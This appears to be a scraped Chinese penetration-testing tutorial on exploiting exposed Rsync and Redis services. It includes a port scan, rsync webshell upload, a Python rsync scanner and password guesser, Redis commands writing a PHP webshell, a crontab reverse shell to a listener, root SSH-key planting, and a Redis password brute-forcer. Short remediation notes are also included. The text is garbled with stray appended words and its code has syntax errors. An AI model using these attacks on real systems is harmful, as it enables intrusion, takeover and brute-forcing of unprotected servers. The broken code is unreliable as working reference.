3.2.1 Rsync
3.2.2 Python编写rsync扫描器
3.3 Redis
Rsync
Rsync介绍php
•Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,能够保持原来文件的权限、时间、软硬连接等附加信息。html
•rsync 默认同步时是不加密的,可以使用 ssh隧道 的方式来进行加密同步git
默认端口:873github
配置参数redis
错误的配置参数shell
案例数据库
我是如何沦陷ChinaZ下载站服务器的安全
http://www.anquan.us/static/bugs/wooyun-2013-026232.htmlbash
漏洞扫描与发现服务器
nmap -n --open -p 873 X.X.X.X/24
<php phpinfo(); ?>
rsync test.php 192.168.5.133::bak/hacker.php
修复
限定访问的IP
不容许匿名访问
防止弱口令
禁用root权限
Python编写rsync扫描器
Python编写批量扫描
需求
扫描开放的873端口
获取rsync目录
密码尝试
代码
import os
import datetime
import threading
from socket import *
def save_file(result):
create\_file\_name = datetime.datetime.now().strftime('%Y-%m-%d')
new\_file = ‘{}\_open.txt’.format(create\_file\_name)
with open(new_file,'a+') as fd:
fd.writelines(result + '\\n')
def socket_request(tarip,tarport);
try:
timeout = 2
setedfaulttimeout(timeout)
s = socket(af\_INET,SOCK\_STREAM)
address = (str(tarip),int(tarport))
s.connect(address)
s.close()
info = ‘{}:{} Open’.format(tarip,tarport)
print('\\033\[6;30;42m' + '\\033\[0m')
save_file(tarip)
yield info
except:
print('\\033\[0;31m' + '{}:{} {}'.format(tarip,tarport,'Close') + '\\033\[0m')
def port\_open\_scan():
with open('ip.txt','r') as read_ip:
tarport = 873
for ip in read_ip
target_ip = ip.strip()
socket_request(ip,tarport)
for x in socket\_request(target\_ip,tarport):
pass
def rsync\_pass\_check(ip):
ip = ip.strip()
command = "rsync" + "::"
print("Checking {}".fjormat(ip))
dirlist = \[\]
for line in os.popen(command):
x = line.find("\\t")
y = line\[0:x\]
dirlist.append(y)
for dir in dirlist:
userlist = \["www","root","test"\]
for user in userlist:
crack\_command = "rsync " + user + "@" + ip + "::" + dir + “--password\_file=pass.txt”
try:
output = os.system(crack_command)
if os.popen(crack_command).read():
res\_str = "\[+\] Vul Found: " + crack\_command
with open("Vuln_IP.txt","a+") as f:
f.write(res_str+"\\n")
else:
pass
except Exception as e:
print(e)
def main():
port\_open\_scan()
open\_port = '{}\_open.txt'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
with open(open_port,'r') as f:
iplist = f.readlines()
for ip in iplist:
rsync\_pass\_check(ip)
if \_\_name\_\_ == '\_\_main\_\_'
t = threading.Thread(target=main)
t.start()
Redis
Redis安全事件
redis是一个开源、支持网络、基于内存、键值对存储数据库,使用ANSI C编写。
自从Redis未受权问题获取Linux系统root权限的攻击方法的披露后,因为其易用性,利用该问题入侵Linux服务进行挖矿
安全事件
凤凰网某站点redis未受权访问致使Getshell
http://www.anquan.us/static/bugs/wooyun-2015-0161323.html
Redis默认安装
wget https://codeload.github.com/antirez/redis/tar.gz/2.8.21
make
make install
cp -p redis.conf /etc/
redis-server /etc/redis.conf
未受权访问获取Shell
获取WebShell
条件:网站路径
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
写入crontab任务
set x "\n* * * * * bash -i >& /dev/tcp/192.168.4.107/6666 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
Save
Attack: nc –lvnp 6666
写入ssh公钥
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 192.168.4.1 -x set crack
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
Save
ssh -i id_rsa root@192.168.4.1
Python爆破Redis
代码
from socket import *
ip = '192.168.4.106'
port = 6379
timeout =2
setdefaulttimeout(timeout)
s= socket(AF\_INET,SOCK\_STREAM)
s.connect((ip,int(port)))
s.send(b"INFO\\r\\n")
result = s.recv(1024)
if b"redis_version" in result:
print("未受权访问")
elif b"Authentication" in result:
with open('pass.txt','r') as read_pass:
for password in read_pass:
password = password.strip()
s = socket(AF\_INET,SOCK\_STREAM)
s.connect((ip,int(port)))
s.send("AUTH {}\\r\\n".format(password).encode('utf-8'))
result = s.recv(1024)
if b'+OK' in result:
print("密码: {}".format(password))
修复
1.设置密码
redis.conf中添加
requirepass 123qwqwdg23
2.不要把Redis暴露再公网
3.普通权限启动
user add -r redis
chown -R redis:redis /usr/local/redis/
su redis
redis-server /etc/redis.conf
4.对.ssh降权和锁定
su - redis
chmod 400 .ssh/authorized_keys
chatter +i .ssh/authorized_keys
chatter +i .ssh